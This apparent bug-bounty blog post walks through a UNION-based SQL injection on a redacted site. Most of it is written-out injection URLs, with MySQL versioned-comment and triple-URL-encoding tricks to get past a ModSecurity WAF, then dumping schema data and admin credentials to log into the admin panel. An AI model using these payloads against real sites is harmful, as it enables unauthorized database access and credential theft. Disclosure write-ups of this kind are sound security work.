Hey WAF! Better Luck Next Time! 👽
Those who Don’t know me I am AkashRoxStarz, Third Year B-tech Computer science Student. I am Certified Ethical hacker,Security Researcher,Pentester And Part time bug hunter.This is my First blog post I am gonna share with you” UNION based SQL injection+ WAF Bypass — ->Admin panel login”
What is SQLI?
An SQL injection attack is one of the most frequently occurring web hacking prevalent today, whereas an attacker uses web page inputs to insert a malicious code in SQL statements. It usually occurs when a web page asks for user input like username or ID The attacker uses this opportunity to insert a SQL statement which ends up running on your database without your knowledge.
So Recently I was working on a private program, I was Trying to Escalate a Blind SSRF for Straight 3hours, and got fed up! so Took a small break, and opened my laptop again, This time I thought of having fun, so before Escalating my SSRF, I opened a New tab a started searching “Google dorks” for SQL injection, dork used: inurl:”.php?id=1
I was Going Through many sites, and randomly found a site say:Redacted.com having a responsible disclosure program, with my google dork, I found a URL like
So ,as per The First step I started To give Error, Singlecolon ‘ was used ,so the URL was like https://redacted.com/otherevent.php?id=.1'and response Was 500 internal domain Error!
So Now I was trying to balance the Query to get the 200 response, so I just used — -to balance the query, so my Url now is https://redacted.com/otherevent.php?id=1' — -
and was Shocked to see the 200 response, I was like
So Now I confirmed That the site is vulnerable to SQL injection.
So very Quickly I Started to check No of columns in the database I used the following Command +ORDER+BY+10 so my Url was
https://redacted.com/otherevent.php?id=1'+ORDER+BY+10 — -
The site was Blanked-No response
https://redacted.com/otherevent.php?id=1'+ORDER+BY+9 — -
Got my 200 Response Back!
Now I started to check What were the Vulnerable Columns so I injected the following payload +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9
To Make the Query Balanced I gave a (-) minus Symbol next to ID=-1 (i.e) making LHS=RHS equally balanced
The URL was now
https://redacted.com/otherevent.php?id=-1' +UNION+ALL+SELECT+ 1,2,3,4,5,6,7,8,9 — -
The Respose was 406 Not Acceptable!
The site was Protected with “Mod_security WAF”
So It’s Time to Bypass the WAF! I started with simple WAF bypass ,so first I tested With Preg_replace() method — — — -> BLOCKED
https://redacted.com/otherevent.php?id=-1' UNunionION+AlAL+SEselectLECT +1,2,3,4,5,6,7,8,9 — -
Next with whitespace Characters %0b — — — → BLOCKED
https://redacted.com/otherevent.php?id=-1' +uni%0bon+A%0bLL+se%0blect+ 1,2,3,4,5,6,7,8,9 — -
Next with Special Characters /*!+ — — — — ->BLOCKED
https://redacted.com/otherevent.php?id=-1' /*!+UNION+SELECT+ALL+*/ 1,2,3,4,5,6,7,8,9 — -
And Finally With Number and special Characters — — — -> BYPASSED!
String used to bypass → +/*!50000
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,3,4,5,6,7,8,9 — -
Now I was able to see the Vulnerable Column, It was No:3
Now I started inject the payload in no 3 to find “User,version,banner and Database name!”
There was No WAF Protected the strings,so I easily got the Database name!
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,database(),4,5,6,7,8,9 — -
so Next Step is to list the tables in the database, so I injected the Query to get the tables
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+ 1,2,group_concat(table_name),4,5,6,7,8,9from information_schema.tables where table_schema=database() — -
Again “WAF BLOCKED ME”
Again Tried with +/*!50000 strings — — — → Blocked!
Tried with +/*!13337 strings — — — — —> Blocked!
And Finally +/*!12345 strings — — — — -> Bypassed
Bypassed String Used: +/*!12345
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(table_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.tables*/ where table_schema=database() — -
My Eyes Quickly Went to Admin, so I simply started Crawling the website and got a “ADMIN LOGIN PANEL” 😲
So Now My AIM was to get ADMIN CREDINTIALS and login into adminpanel so that we “Could Upload a backdoor ( .Php shell) and Could DEFACE THE WEBSITE TOO!”
And “Using The Same Bypass String I was Able to get the Columns List Too!”
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(column_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.columns*/ where table_schema=database() — -
The Final Step was too Dump the data as I was Trying to Dump the data eg:banner,batch,Gallery, I was successfully able to dump the data
https://redacted.com/otherevent.php?id=-1' +/*!50000UNION+SELECT+ALL*/+1,2,group_concat(column_name),4,5,6,7,8,9 /*!12345from*/ /*!12345 information_schema.columns*/ where table_schema=’Gallery’ — -
But the Problem was Now With “dumping ADMIN DATA”
WAF was Blocking “ADMIN” string,
Again I tried with same above method to Bypass methods!
Again Tried with +/*!50000 strings — — — → Blocked!
Tried with +/*!13337 strings — — — — → Blocked!
Tried with +/*!12345 strings — — — — -> Blocked!
Tried with html <br> string — — — — → Blocked!
Tried with 0xHEX encoding — — — — → Blocked!
Tried with URL encoding — — — — — → Blocked!
Tried with Base64 encoding — — — — ->Blocked
So I started going Again with Publicly disclosed Reports And Blogs for bypassing!
After an Hour Spent I came with an intresting blog where double URL encoding was bypassed!
So I started with Double encoding the “ADMIN” URL STRING but again BLOCKED!
“Finally I encoded the Double URL again to TRIPLE URL ENCODING, and was Suprised to see that it showed a 200 response! with admin username”
And Eventually I got the Password too!
Now I went to Admin panel and gave the Username and password!Boom!
I was Completely Excited over this Bypass,
Now I saw an Upload option In admin panel I could have Easily uploaded a .php shell and could have even defaced the website Too!
But that’s not the goal of an WHITE HAT HACKER! so I just started writing a good report with POC and submitted it!
- Full database Takeover
- Bypass Admin Panel Login
- Defacement Of Website too!
Bug Bounty tips:
If you are struck at Esclating a bug, Read as much as blogs and H1 reports, You will find beautiful methods and Bypasses overthere.
Let’s Get Chained! Follow me on Instagram:
Thanks a lot for reading my blog, Hit the Clap button if you enjoyed it 🙏, We will meet in next blog,until then signing off from now Master Akashroxstarz
Cheers, Happy hunting!